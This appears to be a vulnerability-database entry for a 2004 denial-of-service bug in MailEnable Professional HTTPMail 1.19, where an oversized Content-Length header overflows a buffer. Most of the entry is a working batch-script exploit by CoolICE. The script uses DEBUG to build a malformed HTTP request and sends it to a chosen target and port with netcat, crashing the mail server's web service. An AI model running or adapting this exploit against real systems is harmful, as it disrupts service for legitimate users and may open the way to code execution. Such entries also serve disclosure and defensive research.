MailEnable 1.1x Content-Length Denial of Service Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType

MailEnable HTTP service vulnerability 1.19 on Windows allows remote attackers to cause a denial of service or possibly execute arbitrary code via a long "Content-Length" in an HTTP reques


                                                source: http://www.securityfocus.com/bid/10838/info

MailEnable is reported prone to a remote denial of service vulnerability. This vulnerability is reported to exist in the MailEnable HTTP header parsing code.

When reading a large content-length header field from an HTTP request, the operation overflows a fixed size memory buffer and the HTTP service will reportedly crash.

The vulnerability can be exploited to crash the affected HTTP service, denying service to legitimate users. The possibility to execute arbitrary code may also be present.

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:Application:   MailEnable Professional HTTPMail
:Vendors:       http://www.mailenable.com/
:Version:       1.19
:Platforms:     Windows
:Bug:           D.O.S
:Date:          2004-07-30
:Author:        CoolICE
:E_mail:        CoolICE#China.com
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
@echo off
;if &#39;%1&#39;==&#39;&#39; echo Usage:%0 target [port]&&goto :eof
;set PORT=8080
;if not &#39;%2&#39;==&#39;&#39; set PORT=%2
;for %%n in (nc.exe) do if not exist %%~$PATH:n if not exist nc.exe
echo Need nc.exe&&goto :eof
;DEBUG &#60; %~s0
;GOTO :run

e 100 &#34;GET / HTTP/1.0&#34; 0D 0A &#34;Content-Length: &#34;
!DOS@length&#62;0x64
f 120 183 39
e 184 &#34;XXXX&#34; 0d 0a 0d 0a
rcx
8c
nhttp.tmp
w
q


:run
nc %1 %PORT% &#60; http.tmp
del http.tmp

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1